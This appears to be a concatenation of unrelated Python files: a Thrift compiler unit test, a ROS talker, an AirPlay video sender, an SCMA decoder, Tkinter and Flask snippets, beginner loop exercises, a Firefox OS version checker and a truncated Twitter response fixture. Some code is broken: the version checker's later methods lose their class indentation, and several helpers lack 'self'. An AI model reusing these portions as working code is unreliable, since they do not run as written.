    def test_compiler_postfix(self):
        """compiler_postfix maps to the postfix property and is writable."""
        expected = self.yaml['compiler_postfix']
        self.assertEqual(expected, self.compiler.postfix)
        expected = HelperTools.get_random()
        self.compiler.postfix = expected
        self.assertEqual(expected, self.compiler.postfix)

    def test_supported_languages(self):
        """languages round-trips and drives is_language_supported()."""
        expected = self.yaml['supported_languages']
        self.assertEqual(expected, self.compiler.languages)
        expected = HelperTools.get_random()
        self.compiler.languages = expected
        self.assertEqual(expected, self.compiler.languages)
        self.assertTrue(self.compiler.is_language_supported(expected[0]))
        self.assertFalse(self.compiler.is_language_supported("zzzzzzzz"))

    def test_bad_init_data(self):
        """An empty config falls back to the documented defaults."""
        # FIX: renamed the local from 'dict', which shadowed the builtin.
        empty_config = {}
        conf = Config()
        bad_compiler = ThriftCompiler(empty_config)
        self.assertEqual(bad_compiler.version, "0.6.1")
        self.assertEqual(bad_compiler.postfix, "")
        language = "java"
        self.assertEqual(bad_compiler.is_language_supported("java"), False)
        self.assertEqual(bad_compiler.language_options(), conf.get_thrift_option("global_compiler_options")[language])
# Allow running this test module directly.
if __name__ == '__main__':
    unittest2.main()
|
#!/usr/bin/python3.5
# Install packages to use Python3 with ROS
# sudo apt-get install python3-yaml
# sudo pip3 install rospkg catkin_pkg
import rospy
import sys
from std_msgs.msg import String
def talker():
    """Publish "hello world <time>" on the 'chatter' topic once per second."""
    pub = rospy.Publisher('chatter', String, queue_size=10)
    rospy.init_node('talker', anonymous=True)
    rate = rospy.Rate(1)  # 1 Hz (the original comment said "10hz", but Rate(1) is one message per second)
    print ("Python Version: ", sys.version)
    while not rospy.is_shutdown():
        hello_str = "hello world %s" % rospy.get_time()
        rospy.loginfo(hello_str)  # log and publish the same string
        pub.publish(hello_str)
        rate.sleep()              # sleep whatever remains of the 1-second period
# ROSInterruptException is raised when the node is shut down mid-sleep;
# that is a normal exit here, so it is swallowed.
if __name__ == '__main__':
    try:
        talker()
    except rospy.ROSInterruptException:
        pass
|
#!/usr/bin/env python
import socket
import select
import sys
import pybonjour
import time
# Video URL/path to play: the first command-line argument.
selectedVideo = sys.argv[1]
regtype = "_airplay._tcp"   # Bonjour service type advertised by AirPlay receivers
timeout = 5                 # seconds to wait on each select() call
resolved = []               # sentinel list: non-empty once a service resolved
host = None                 # the discovered AirPlayDevice
queried = []                # sentinel list: non-empty once the A-record query finished
#
# Data Model for a Air Play Device
#
class AirPlayDevice:
    """Value object describing one discovered AirPlay receiver."""

    def __init__(self, interfaceIndex, fullname, hosttarget, port):
        # Raw mDNS resolution data, kept as received.
        self.interfaceIndex = interfaceIndex
        self.fullname = fullname
        self.hosttarget = hosttarget
        self.port = port
        # Filled in later by the A-record query callback.
        self.ip = 0
        # Human-readable name: the host target minus its mDNS suffix.
        self.displayname = hosttarget.replace(".local.", "")
# Defines the Post message to play the selected video
def post_message(sel_vid):
    """Build the AirPlay /play HTTP request that starts *sel_vid* at 0:00."""
    body = "Content-Location: %s\nStart-Position: 0\n\n" % (sel_vid)
    header = "POST /play HTTP/1.1\n" \
             "Content-Length: %d\n" \
             "User-Agent: MediaControl/1.0\n\n" % len(body)
    return header + body
#
# Connecting to the selected AirPlay device
# and sends the video to it
def connect_to_socket(ip, port):
    # Open a TCP connection to the receiver and send the /play request,
    # then keep the connection alive until the user hits CTRL-C.
    print "connect to socket"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(post_message(selectedVideo))
    var = 1
    print "Press CTRL-C to end."
    timeTrigger = 0
    while var == 1 : # This constructs an infinite loop
        # keep the socket alive by sending a packet once per second
        # NOTE(review): this loop busy-spins at full CPU between sends; a
        # time.sleep() would achieve the same keep-alive far more cheaply.
        curTime = time.time()
        if curTime > timeTrigger:
            s.send("\0")
            timeTrigger = curTime + 1
# Gets the IP from selected device
def query_record_callback(sdRef, flags, interfaceIndex, errorCode, fullname, rrtype, rrclass, rdata, ttl):
    # A-record answer: rdata holds the packed IPv4 address of the device.
    if errorCode == pybonjour.kDNSServiceErr_NoError:
        host.ip = socket.inet_ntoa(rdata)
        queried.append(True)  # signal the main loop that the query finished
def resolve_callback(sdRef, flags, interfaceIndex, errorCode, fullname,
                     hosttarget, port, txtRecord):
    # Successful resolve: capture the device details in the global `host`.
    if errorCode == pybonjour.kDNSServiceErr_NoError:
        print 'Resolved service:'
        print ' fullname =', fullname
        print ' hosttarget =', hosttarget
        print ' port =', port
        global host
        host = AirPlayDevice(interfaceIndex, fullname, hosttarget, port)
        resolved.append(True)  # signal browse_callback's wait loop
def browse_callback(sdRef, flags, interfaceIndex, errorCode, serviceName,
                    regtype, replyDomain):
    # Called for every AirPlay service appearing or disappearing on the LAN.
    print "browse callback"
    if errorCode != pybonjour.kDNSServiceErr_NoError:
        return
    if not (flags & pybonjour.kDNSServiceFlagsAdd):
        print 'Service removed'
        return
    print 'Service added; resolving'
    resolve_sdRef = pybonjour.DNSServiceResolve(0,
                                                interfaceIndex,
                                                serviceName,
                                                regtype,
                                                replyDomain,
                                                resolve_callback)
    try:
        # Pump the resolver until resolve_callback fires or we time out.
        while not resolved:
            ready = select.select([resolve_sdRef], [], [], timeout)
            if resolve_sdRef not in ready[0]:
                print 'Resolve timed out'
                break
            pybonjour.DNSServiceProcessResult(resolve_sdRef)
        else:
            resolved.pop()  # consume the flag so the next service can resolve
    finally:
        resolve_sdRef.close()
# 1) Browse mDNS until an AirPlay service is found and resolved into `host`.
browse_sdRef = pybonjour.DNSServiceBrowse(regtype = regtype,
                                          callBack = browse_callback)
try:
    try:
        while not host:
            ready = select.select([browse_sdRef], [], [])
            if browse_sdRef in ready[0]:
                pybonjour.DNSServiceProcessResult(browse_sdRef)
    except KeyboardInterrupt:
        pass
finally:
    browse_sdRef.close()
# 2) Query the host's A record to turn the mDNS name into an IPv4 address.
query_sdRef = pybonjour.DNSServiceQueryRecord(interfaceIndex = host.interfaceIndex,
                                              fullname = host.hosttarget,
                                              rrtype = pybonjour.kDNSServiceType_A,
                                              callBack = query_record_callback)
try:
    while not queried:
        ready = select.select([query_sdRef], [], [], timeout)
        if query_sdRef not in ready[0]:
            print "Query not in record"
            break
        pybonjour.DNSServiceProcessResult(query_sdRef)
    else:
        queried.pop()
finally:
    query_sdRef.close()
# 3) Send the /play request and keep the connection alive.
connect_to_socket(host.ip, host.port)
|
import config
import codebook64 as CODEBOOK
import math
import numpy as np
import itertools
import copy
# Factor-graph adjacency lists, (re)built by init():
#   eta[k]     = 1-based user indices attached to resource node k
#   epsilon[j] = 1-based resource indices attached to user node j
eta = [];
epsilon = [];
class _DecoderHelper():
    """Internal helpers for SCMA message-passing (MPA) decoding.

    Operates on the module-level eta/epsilon adjacency lists and the arrays
    held in the ``config`` module (Ev_f, Ef_v, resourceLayer, sigma, ...).
    """
    def getCombination(self, k, j):
        # All codeword combinations of the users on resource k except user j.
        listUsers = []
        for i, user in enumerate(eta[k]):
            if user != j:
                listUsers.append(CODEBOOK.getCodewords(user)[k]);
        return list(itertools.product(*listUsers));
    def buildEta(self, factorGraph):
        # eta[k] = 1-based indices of the users (columns) active on resource k.
        global eta;
        eta = [];
        for k in range(factorGraph.shape[0]):
            temp = [];
            for i,vNode in enumerate(factorGraph[k]):
                if vNode == 1:
                    temp.append(i+1);
            eta.append(temp);
    def buildEpsilon(self, factorGraph):
        # epsilon[j] = 1-based indices of the resources (rows) used by user j.
        global epsilon;
        epsilon = [];
        for j in range(factorGraph.shape[1]):
            temp = [];
            for i,fNode in enumerate(factorGraph[:,j]):
                if fNode == 1:
                    temp.append(i+1);
            epsilon.append(temp);
    def getMessage(self, k, j, cw):
        # Gaussian likelihood of the received symbol on resource k given that
        # user j sent codeword cw and the interfering users sent every
        # possible codeword combination.
        combination = np.sum(self.getCombination(k,j),axis=1)+CODEBOOK.getCodeword(j, cw)[k];
        resourceK = np.reshape(config.resourceLayer[:,k], (config.resourceLayer[:,k].shape[0],1))
        resourceK = np.repeat(resourceK, 16, axis=1);
        dividend = resourceK-combination;
        return np.exp(-(dividend*dividend.conjugate())/(config.sigma**2))
    def productSequencev_f(self, k, j, cw):
        # Product of the variable->function messages of the interferers on k.
        usersProb = [];
        for i, user in enumerate(eta[k]):
            if user != j:
                usersProb.append(config.Ev_f[:,k, user-1].transpose());
        usersProb = np.asarray(usersProb);
        return np.prod(list(itertools.product(*usersProb)),axis=1).transpose()
    def getEf_v(self, k, j, cw):
        # Function-node k -> variable-node j message for codeword cw.
        return np.sum(self.getMessage(k, j, cw)*self.productSequencev_f(k,j,cw),axis=1);
    def productSequencef_v(self,k,j):
        # Product of the function->variable messages arriving at user j,
        # excluding the one coming from resource k.
        # BUG FIX: np.float was removed in NumPy 1.24; the builtin float is
        # the documented drop-in replacement (same float64 dtype).
        resourcesProb = np.ones(shape=(config.numSymbols,config.numCodeWords),dtype = float)
        for i, resource in enumerate(epsilon[j]):
            if resource != k:
                resourcesProb = resourcesProb*config.Ef_v[:,resource-1,j]
        return resourcesProb
    def All_productSequencef_v(self,j):
        # Same as productSequencef_v but over *all* resources of user j
        # (used for the final symbol decision).
        resourcesProb = np.ones(shape=(config.numSymbols,config.numCodeWords))
        for i, resource in enumerate(epsilon[j]):
            resourcesProb = resourcesProb*config.Ef_v[:,resource-1,j]
        return resourcesProb
    def magnitude(self,v):
        # Row-wise Euclidean magnitude.
        return np.sqrt(np.sum(np.square(np.absolute(v)),axis=1));
    # NOTE(review): add/sub/dot below are missing the ``self`` parameter, so
    # calling them on the instance would bind ``self`` to ``u``.  They look
    # like unused dead code — confirm before relying on them.
    def add(u, v):
        return [ u[i]+v[i] for i in range(len(u)) ]
    def sub(u, v):
        return [ u[i]-v[i] for i in range(len(u)) ]
    def dot(u, v):
        return sum(u[i]*v[i] for i in range(len(u)))
    def normalize(self,v):
        # Normalize each row by its L1 mass so the row entries sum to 1.
        vmag = np.sum(np.absolute(v),axis=1);
        v = v / vmag[:,None];
        return v;
    def getEv_f(self,k, j):
        # Variable-node j -> function-node k message (normalized belief).
        normalizedProduct = self.normalize(self.productSequencef_v(k,j));
        return normalizedProduct;
# Module-level singleton used by the free functions below.
DECODERHELPER = _DecoderHelper();
def init():
    """Build the eta/epsilon adjacency lists from the configured factor graph."""
    DECODERHELPER.buildEta(config.factorGraph);
    DECODERHELPER.buildEpsilon(config.factorGraph);
def messagePassing():
    """One MPA round: update all f->v messages, then all v->f messages."""
    # update message from Function Node to Variable Node
    for k in range(config.factorGraph.shape[0]):
        for j, j_th in enumerate(eta[k]):
            for index in range(config.numCodeWords):
                config.Ef_v[:,k,j_th-1,index] = DECODERHELPER.getEf_v(k,j_th,index);
    # update message from V Node to F Node
    for j in range(config.factorGraph.shape[1]):
        for k, k_th in enumerate(epsilon[j]):
            config.Ev_f[:,k_th-1,j,:] = DECODERHELPER.getEv_f(k_th,j);
def iterativeMPA(iteration):
    """Run message passing for at most *iteration* rounds.

    Stops early once config.EstimatedSymbols has stayed unchanged for three
    consecutive rounds; returns the index of the last round executed.
    """
    iterationThreshold = 0;
    temp = [];
    iterationEnd = 0;
    for i in range(iteration):
        temp = copy.copy( config.EstimatedSymbols);  # snapshot for the convergence check
        iterationEnd = copy.copy(i)
        #print("estimateSymbol",config.EstimatedSymbols)
        if iterationThreshold > 2:
            break;
        messagePassing();
        estimateSymbol();
        # Count consecutive rounds with no change in the decisions.
        if np.allclose(temp, config.EstimatedSymbols):
            iterationThreshold += 1;
    #print("iteration end", iterationEnd)
    return iterationEnd;
def estimateSymbol():
    """Hard-decide each user's symbol as the argmax of its total belief."""
    for j in range(config.factorGraph.shape[1]):
        config.EstimatedSymbols[j] = np.argmax(DECODERHELPER.All_productSequencef_v(j),axis=1);
|
from Tkinter import *
from PIL import Image, ImageTk
# Build a 300x300 canvas showing Lenna.png with two text captions.
# (Python 2: imports use the old "Tkinter" module name.)
root = Tk()
w = Canvas(root, width=300, height=300)
im = Image.open("Lenna.png")
photo = ImageTk.PhotoImage(im)  # keep a reference, or Tk drops the image
w.create_image(100, 100, image=photo, anchor=CENTER)
w.create_text(100, 240, font=("Arial",16), text="Hello", fill="red")
w.create_text(100, 270, font=("Arial",16), text="world!", fill="blue")
w.pack()
root.mainloop()  # blocks until the window is closed
|
# num = input("请问你想抽奖多少次:")
# num = int(num)
# for i in range(num):
# print("抽第%d次" % (i+1))
# print("抽第{}次".format(i+1))
# print("抽奖完毕,祝您好运。")
# for i in range(1, 10):
# for j in range(1, i+1):
# a = i*j
# print("{}*{}={}\t".format(i, j, a), end="")
# print()
# for i in range(1, 10):
# for j in range(1,i+1):
# print("%d*%d=%d\t"%(j,i,i*j),end="")
# print()
# a = 1
# count = 1
# while count < 100:
# a += 1
# print(a)
# count += 1
# print(a + a)
# sum = 0
# count = 1
# while count < 101:
# sum += count
# count += 1
# print(sum)
# for i in range(1, 101):
# # j j = i+1
# # sum1 = i +
# # sum += int(sum1)
# sum = 0
# sum += i
# sum += sum
# print(su)
# sum = 0
# for i in range(1, 101):
# sum += i
# print(sum)
# play = input("欢迎参加幸运大抽奖,请问您要抽几次:")
# count = 1
# while count < int(play)+1:
# if count == 7:
# print("恭喜你抽中大奖")
# count += 1
# continue
# print("第{}次".format(count))
# count += 1
# print("抽奖结束")
# play = input("欢迎参加幸运大抽奖,请问您要抽几次:")
# count = 1
# while count < int(play)+1:
# if count == 7:
# print("恭喜你抽中大奖")
# count += 1
# break
# print("第{}次".format(count))
# count += 1
# print("抽奖结束")
# count = 1
# while count < 11:
# if count == 6:
# print("不合格")
# count += 1
# continue
# print("合格")
# count += 1
# num = int(input("今天要吃几个包子?"))
# for i in range(1, num+1):
# if i == 11:
# break
# print("第{}个".format(i))
# else:
# print("吃完了,好饱")
# print("over")
# for b in range(1, 10):
# for s in range(1, 10):
# for g in range(1, 10):
# sum1 = int(b)*100 + int(s)*10 + int(g)
# sum2 = b**3 + s**3 + g**3
# if sum1 == sum2:
# print("百位数为:{},十位数为:{},个位数为;{}".format(b, s, g))
# # else:
# # print("none")
# "Hundred chickens" puzzle: buy exactly 100 birds for exactly 100 coins.
# Prices here are scaled x3 (rooster 15, hen 9, chick 1) so everything is an
# integer: find (g, m, j) with 15*g + 9*m + j == 300 and g + m + j == 100.
solutions = []
for g in range(1, 100):
    for m in range(1, 100):
        # j is fully determined by the head-count constraint, so the third
        # nested loop of the original (~10^6 iterations) is unnecessary.
        j = 100 - g - m
        if j >= 1 and 15 * g + 9 * m + j == 300:
            solutions.append((g, m, j))
            print("公鸡{}只,母鸡{}只,小鸡{}只".format(g, m, j))
# BUG FIX: the original attached this print to an ``else`` inside the inner
# loop, emitting "完" for every one of the ~10^6 failing combinations; it is
# meant as a final "done" marker and now prints exactly once.
print("完")
|
from flask import render_template
from .import app
@app.app_errorhandler(404)
def fourowfour(error):
    # Render the custom "not found" page, keeping the 404 status code.
    return render_template('fourowfour.html'), 404
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import re
import os
import json
import shutil
import logging
import zipfile
import tempfile
import argparse
import subprocess
from distutils import util
from datetime import datetime
from argparse import ArgumentDefaultsHelpFormatter
from util import console_utilities
from util.adb_helper import AdbHelper
from util.adb_helper import AdbWrapper
logger = logging.getLogger(__name__)
class VersionChecker(object):
    """Collects and reports version information from a Firefox OS device."""
    def __init__(self):
        # All fields are populated later by cli() / the set_* methods below.
        self.devices = None
        self.device_info_list = []
        self.no_color = False   # disable ANSI colors in console output
        self.serial = None      # adb serial number of the target device
        self.log_text = None    # optional plain-text output file path
        self.log_json = None    # optional JSON output file path
    def set_serial(self, serial):
        """
        Setup the serial number.
        @param serial: the given serial number.
        """
        self.serial = serial
        logger.debug('Set serial: {}'.format(self.serial))
    def set_no_color(self, flag):
        """
        Setup the no_color flag.
        @param flag: True or False.
        """
        self.no_color = flag
        logger.debug('Set no_color: {}'.format(self.no_color))
    def set_log_text(self, log_text):
        """
        Setup the log_text file path.
        @param log_text: the output text file path.
        """
        self.log_text = log_text
        logger.debug('Set log_text: {}'.format(self.log_text))
    def set_log_json(self, log_json):
        """
        Setup the log_json file path.
        @param log_json: the output json file path.
        """
        self.log_json = log_json
        logger.debug('Set log_json: {}'.format(self.log_json))
    def cli(self):
        """
        Parse the command-line arguments, configure logging, store the
        options on the instance, and return the instance itself.
        """
        # argument parser
        arg_parser = argparse.ArgumentParser(description='Check the version information of Firefox OS.',
                                             formatter_class=ArgumentDefaultsHelpFormatter)
        arg_parser.add_argument('--no-color', action='store_true', dest='no_color', default=False,
                                help='Do not print with color. NO_COLOR will overrides this option.')
        arg_parser.add_argument('-s', '--serial', action='store', dest='serial', default=None,
                                help='Directs command to the device or emulator with the given serial number. '
                                     'Overrides ANDROID_SERIAL environment variable.')
        arg_parser.add_argument('--log-text', action='store', dest='log_text', default=None, help='Text ouput.')
        arg_parser.add_argument('--log-json', action='store', dest='log_json', default=None, help='JSON output.')
        arg_parser.add_argument('-v', '--verbose', action='store_true', dest='verbose', default=False,
                                help='Turn on verbose output, with all the debug logger.')
        # parse args and setup the logging
        args = arg_parser.parse_args()
        # setup the logging config: DEBUG with timestamps when verbose,
        # otherwise a terse level-prefixed format.
        if args.verbose is True:
            verbose_formatter = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
            logging.basicConfig(level=logging.DEBUG, format=verbose_formatter)
        else:
            formatter = '%(levelname)s: %(message)s'
            logging.basicConfig(level=logging.INFO, format=formatter)
        # check ADB is available before doing anything device-related
        AdbWrapper.check_adb()
        # assign variable
        self.set_no_color(args.no_color)
        self.set_serial(args.serial)
        self.set_log_text(args.log_text)
        self.set_log_json(args.log_json)
        # return instance
        return self
    @staticmethod
    def get_device_info(serial=None):
        """
        Get the device information, include Gaia Version, Gecko Version, and so on.

        Pulls omni.ja / Gaia's application.zip / application.ini from the
        device over adb into a temp dir, extracts the version data, and
        combines it with getprop firmware values.
        @param serial: device serial number. (optional)
        @return: the information dict object.
        """
        tmp_dir = None
        try:
            tmp_dir = tempfile.mkdtemp(prefix='checkversions_')
            # pull data from device
            try:
                AdbWrapper.adb_pull('/system/b2g/omni.ja', tmp_dir, serial=serial)
            except Exception as e:
                logger.debug(e)
                logger.error('Error pulling Gecko file.')
            # Gaia's application.zip may live under /data or /system
            # depending on the build; try both locations in order.
            try:
                AdbWrapper.adb_pull('/data/local/webapps/settings.gaiamobile.org/application.zip', tmp_dir,
                                    serial=serial)
            except Exception as e:
                logger.debug(e)
                try:
                    AdbWrapper.adb_pull('/system/b2g/webapps/settings.gaiamobile.org/application.zip', tmp_dir,
                                        serial=serial)
                except Exception as e:
                    logger.debug(e)
                    logger.error('Error pulling Gaia file.')
            try:
                AdbWrapper.adb_pull('/system/b2g/application.ini', tmp_dir, serial=serial)
            except Exception as e:
                logger.debug(e)
                logger.error('Error pulling application.ini file.')
            # get Gaia info
            gaia_rev = 'n/a'
            gaia_date = 'n/a'
            application_zip_file = os.path.join(tmp_dir, 'application.zip')
            if os.path.isfile(application_zip_file):
                with open(application_zip_file, 'rb') as f:
                    z = zipfile.ZipFile(f)
                    z.extract('resources/gaia_commit.txt', tmp_dir)
            else:
                logger.warning('Can not find application.zip file.')
            gaiacommit_file = os.path.join(tmp_dir, 'resources/gaia_commit.txt')
            if os.path.isfile(gaiacommit_file):
                with open(gaiacommit_file, "r") as f:
                    # line 1: commit hash; line 2: commit time (epoch seconds)
                    gaia_rev = re.sub(r'\n+', '', f.readline())
                    gaia_date_sec_from_epoch = re.sub(r'\n+', '', f.readline())
                    gaia_date = datetime.utcfromtimestamp(int(gaia_date_sec_from_epoch)).strftime('%Y-%m-%d %H:%M:%S')
            else:
                logger.warning('Can not get gaia_commit.txt file from application.zip file.')
            # deoptimize omni.ja for Gecko info
            gecko_rev = 'n/a'
            if os.path.isfile(os.path.join(tmp_dir, 'omni.ja')):
                deopt_dir = os.path.join(tmp_dir, 'deopt')
                deopt_file = os.path.join(deopt_dir, 'omni.ja')
                deopt_exec = os.path.join(tmp_dir, 'optimizejars.py')
                os.makedirs(deopt_dir)
                # TODO rewrite optimizejars.py if possible
                current_dir = os.path.dirname(os.path.abspath(__file__))
                current_exec = os.path.join(current_dir, 'misc', 'optimizejars.py')
                shutil.copyfile(current_exec, deopt_exec)
                cmd = 'python %s --deoptimize %s %s %s' % (deopt_exec, tmp_dir, tmp_dir, deopt_dir)
                p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
                output = p.communicate()[0]
                logger.debug('optimizejars.py stdout: {}'.format(output))
                # unzip omni.ja to get Gecko info
                if os.path.isfile(deopt_file):
                    with open(deopt_file, 'rb') as f:
                        z = zipfile.ZipFile(f)
                        z.extract('chrome/toolkit/content/global/buildconfig.html', tmp_dir)
                else:
                    logger.warning('Can not deoptimize omni.ja file.')
                    gecko_rev = 'n/a'
                # get Gecko info from buildconfig.html file
                buildconfig_file = os.path.join(tmp_dir, 'chrome/toolkit/content/global/buildconfig.html')
                if os.path.isfile(buildconfig_file):
                    # The revision is the second tag-delimited token of the
                    # "Built from" line.
                    for line in open(buildconfig_file, "r"):
                        if re.search(r'Built from', line):
                            ret = re.findall(r'>(.*?)<', line)
                            gecko_rev = ret[1]
                            break
                else:
                    logger.warning('Can not get buildconfig.html file from omni.ja file.')
            else:
                print 'Can not find omni.ja file.'
            # get Gecko version, and B2G BuildID from application.ini file
            build_id = 0
            version = 0
            if os.path.isfile(os.path.join(tmp_dir, 'application.ini')):
                for line in open(os.path.join(tmp_dir, 'application.ini'), "r"):
                    if re.search(r'^\s*BuildID', line):
                        ret = re.findall(r'.*?=(.*)', line)
                        build_id = ret[0]
                    if re.search(r'^\s*Version', line):
                        ret = re.findall(r'.*?=(.*)', line)
                        version = ret[0]
            else:
                build_id = 'n/a'
                version = 'n/a'
            # get device information by getprop command
            device_name = re.sub(r'\r+|\n+', '', AdbWrapper.adb_shell('getprop ro.product.device', serial=serial)[0])
            firmware_release = re.sub(r'\r+|\n+', '',
                                      AdbWrapper.adb_shell('getprop ro.build.version.release', serial=serial)[0])
            firmware_incremental = re.sub(r'\r+|\n+', '',
                                          AdbWrapper.adb_shell('getprop ro.build.version.incremental', serial=serial)[
                                              0])
            firmware_date = re.sub(r'\r+|\n+', '', AdbWrapper.adb_shell('getprop ro.build.date', serial=serial)[0])
            firmware_bootloader = re.sub(r'\r+|\n+', '',
                                         AdbWrapper.adb_shell('getprop ro.boot.bootloader', serial=serial)[0])
            # prepare the return information
            device_info = {'Serial': serial,
                           'Build ID': build_id,
                           'Gaia Revision': gaia_rev,
                           'Gaia Date': gaia_date,
                           'Gecko Revision': gecko_rev,
                           'Gecko Version': version,
                           'Device Name': device_name,
                           'Firmware(Release)': firmware_release,
                           'Firmware(Incremental)': firmware_incremental,
                           'Firmware Date': firmware_date,
                           'Bootloader': firmware_bootloader}
        finally:
            # Always remove the temp working dir, even when a pull failed.
            if tmp_dir:
                shutil.rmtree(tmp_dir)
                logger.debug('Remove {}.'.format(tmp_dir))
        return device_info
    @staticmethod
    def _print_device_info_item(title, value, title_color=None, value_color=None):
        # Print "title (padded to 22 columns) value" with optional colors.
        console_utilities.print_color('{0:22s}'.format(title), fg_color=title_color, newline=False)
        console_utilities.print_color(value, fg_color=value_color)
def print_device_info(self, device_info, no_color=False):
"""
Print the device information.
@param device_info: The information dict object.
@param no_color: Print with color. Default is False.
"""
# setup the format by platform
if no_color:
title_color = None
sw_color = None
hw_color = None
else:
title_color = console_utilities.COLOR_LIGHT_BLUE
sw_color = console_utilities.COLOR_LIGHT_GREEN
hw_color = console_utilities.COLOR_LIGHT_YELLOW
# print the device information
self._print_device_info_item('Build ID', device_info['Build ID'], title_color=title_color, value_color=sw_color)
self._print_device_info_item('Gaia Revision', device_info['Gaia Revision'], title_color=title_color,
value_color=sw_color)
self._print_device_info_item('Gaia Date', device_info['Gaia Date'], title_color=title_color,
value_color=sw_color)
self._print_device_info_item('Gecko Revision', device_info['Gecko Revision'], title_color=title_color,
value_color=sw_color)
self._print_device_info_item('Gecko Version', device_info['Gecko Version'], title_color=title_color,
value_color=sw_color)
self._print_device_info_item('Device Name', device_info['Device Name'], title_color=title_color,
value_color=hw_color)
self._print_device_info_item('Firmware(Release)', device_info['Firmware(Release)'], title_color=title_color,
value_color=hw_color)
self._print_device_info_item('Firmware(Incremental)', device_info['Firmware(Incremental)'],
title_color=title_color, value_color=hw_color)
self._print_device_info_item('Firmware Date', device_info['Firmware Date'], title_color=title_color,
value_color=hw_color)
if device_info['Bootloader'] is not '':
self._print_device_info_item('Bootloader', device_info['Bootloader'], title_color=title_color,
value_color=hw_color)
print ''
def _output_log(self):
    """
    Write the collected device information to log files.
    Enabled by the I{--log-text} and I{--log-json} arguments.
    """
    if self.log_text is None and self.log_json is None:
        # neither log output was requested
        return
    result = self.get_output_dict()
    if self.log_text is not None:
        # Plain text: "# serial" header per device, then key=value lines.
        buf = []
        for device_serial, device_info in result.items():
            buf.append('# %s\n' % device_serial)
            if device_info.get('Skip') is True:
                buf.append('Skip=%s\n' % device_info['Skip'])
            else:
                for key, value in device_info.items():
                    clean_key = re.sub(r'\s+|\(|\)', '', key)
                    clean_value = re.sub(r'\s+', '_', value)
                    buf.append('%s=%s\n' % (clean_key, clean_value))
            buf.append('\n')
        with open(self.log_text, 'w') as outfile:
            outfile.writelines(buf)
    if self.log_json is not None:
        with open(self.log_json, 'w') as outfile:
            json.dump(result, outfile, indent=4)
def get_output_dict(self):
    """
    Return a dict mapping each device's serial to its info dict (valid
    after run()). Devices with an unknown serial get synthetic keys:
    unknown_serial_1, unknown_serial_2, ...
    """
    result = {}
    unknown_count = 0
    for device_info in self.device_info_list:
        serial = device_info['Serial']
        if serial is None:
            unknown_count += 1
            serial = 'unknown_serial_' + str(unknown_count)
        result[serial] = device_info
    return result
def run(self):
    """
    Entry point: query adb for attached devices, then print (and optionally
    log) the version information for one device or for all of them.
    """
    self.devices = AdbWrapper.adb_devices()
    is_no_color = self.no_color
    # The NO_COLOR environment variable overrides the command-line flag.
    if 'NO_COLOR' in os.environ:
        try:
            # `util.strtobool` accepts values like '1'/'0'/'true'/'false'
            # -- presumably distutils.util; TODO confirm the import.
            is_no_color = bool(util.strtobool(os.environ['NO_COLOR'].lower()))
        except Exception as e:
            logger.debug(e)
            logger.error('Invalid NO_COLOR value [{0}].'.format(os.environ['NO_COLOR']))
    if len(self.devices) == 0:
        raise Exception('No device.')
    elif len(self.devices) >= 1:
        final_serial = AdbHelper.get_serial(self.serial)
        if final_serial is None:
            # No serial selected: walk every attached device.
            self.device_info_list = []
            for device, state in self.devices.items():
                print('Serial: {0} (State: {1})'.format(device, state))
                if state == 'device':
                    device_info = self.get_device_info(serial=device)
                    self.print_device_info(device_info, no_color=is_no_color)
                    self.device_info_list.append(device_info)
                else:
                    # device is attached but not ready (e.g. offline/unauthorized)
                    print('Skipped.\n')
                    self.device_info_list.append({'Serial': device, 'Skip': True})
        else:
            # A specific device was requested.
            print('Serial: {0} (State: {1})'.format(final_serial, self.devices[final_serial]))
            device_info = self.get_device_info(serial=final_serial)
            self.device_info_list = [device_info]
            self.print_device_info(device_info, no_color=is_no_color)
    self._output_log()
def main():
    """CLI entry point: run the version checker and exit 1 on any failure."""
    try:
        checker = VersionChecker().cli()
        checker.run()
    except Exception as err:
        logger.error(err)
        exit(1)


if __name__ == "__main__":
    main()
|
# Canned Twitter "search tweets" API response used as an offline fixture:
# two statuses from @StevenWilsonHQ plus search_metadata. Note the Python
# literals (True/False/None) -- this is a dict, not strict JSON.
responseTwitter= {
    "statuses": [
        {
            "created_at": "Thu Oct 01 14:18:34 +0000 2020",
            "id": 1311671856303411202,
            "id_str": "1311671856303411202",
            "text": "I GOT THE SLEAZE IN MY TEETH, WHEN I MOVE I'M SLICK, NOTHING EVER STICKS TO ME... \n\nhttps://t.co/ESGts1XAgW\u2026 https://t.co/0sAULwV2kp",
"truncated": True,
"entities": {
"hashtags": [],
"symbols": [],
"user_mentions": [],
"urls": [
{
"url": "https://t.co/ESGts1XAgW",
"expanded_url": "https://stevenwilson.lnk.to/ESSo/Youtube",
"display_url": "stevenwilson.lnk.to/ESSo/Youtube",
"indices": [
84,
107
]
},
{
"url": "https://t.co/0sAULwV2kp",
"expanded_url": "https://twitter.com/i/web/status/1311671856303411202",
"display_url": "twitter.com/i/web/status/1\u2026",
"indices": [
109,
132
]
}
]
},
"metadata": {
"result_type": "popular",
"iso_language_code": "en"
},
"source": "<a href=\"https://about.twitter.com/products/tweetdeck\" rel=\"nofollow\">TweetDeck</a>",
"in_reply_to_status_id": None,
"in_reply_to_status_id_str": None,
"in_reply_to_user_id": None,
"in_reply_to_user_id_str": None,
"in_reply_to_screen_name": None,
"user": {
"id": 617155406,
"id_str": "617155406",
"name": "Steven Wilson",
"screen_name": "StevenWilsonHQ",
"location": "",
"description": "This is the official Twitter of musician, singer, songwriter and record producer Steven Wilson.",
"url": "https://t.co/G1ZbAQ0izd",
"entities": {
"url": {
"urls": [
{
"url": "https://t.co/G1ZbAQ0izd",
"expanded_url": "http://stevenwilsonhq.com",
"display_url": "stevenwilsonhq.com",
"indices": [
0,
23
]
}
]
},
"description": {
"urls": []
}
},
"protected": False,
"followers_count": 87118,
"friends_count": 25,
"listed_count": 762,
"created_at": "Sun Jun 24 14:14:45 +0000 2012",
"favourites_count": 4,
"utc_offset": None,
"time_zone": None,
"geo_enabled": False,
"verified": True,
"statuses_count": 1801,
"lang": None,
"contributors_enabled": False,
"is_translator": False,
"is_translation_enabled": False,
"profile_background_color": "0A0A0A",
"profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
